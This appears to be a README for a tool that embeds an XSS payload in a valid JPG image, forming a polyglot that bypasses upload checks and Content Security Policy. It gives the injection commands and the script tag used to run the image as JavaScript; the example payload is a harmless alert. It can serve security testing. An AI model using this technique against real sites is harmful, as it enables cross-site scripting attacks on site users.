A tool inspired by:

This tool automates the proces of generating a polyglot JPG image and XSS payload. The resulting file is a working JPG image which should be validated as valid by any file parser. The containing XSS payload can still be fired by a specially crafted XSS injection. This is usefull if you have limited space to insert your payload and are blocked by the Content Security Policy to load external resources.

It exists of a simple javascript file which inserts specific bytes in certain places to make sure both types are working correctly. It comes down to abusing the JPG file header, comment functionality and JavaScript comments. For the technical details of the proces see the referenced article above.

To use the tool follow the following proces:

git clone

Download or make a normal JPG file, say input.jpg

Make sure it does not already contain characters that look like JavaScript comments, by doing:

xxd img.jpg | grep "2a2f"

If the comment above does not return any output, continue, otherwise choose another image

Execute the following command to insert the payload into the image:

nodejs jpg-polyglot-generate.js input.jpg output.jpg 'alert("Payload");'

To insert a payload from a file, you can also do:

nodejs jpg-polyglot-generate.js input.jpg output.jpg "$(cat file.js | sed 's/\n//g')"

The file should not contain any newlines, so those are removed. Make sure your JavaScript file does allow this.

To use the file you can use the following piece of code to execute the javascript in inside the image file:

<script charset="ISO-8859-1" src="/upload-path/output.jpg"></script>

The image should still work as an image too:

<img src="/upload-path/output.jpg" />

Reach me via:

@ -

- @YouGina

© 1991 - 2023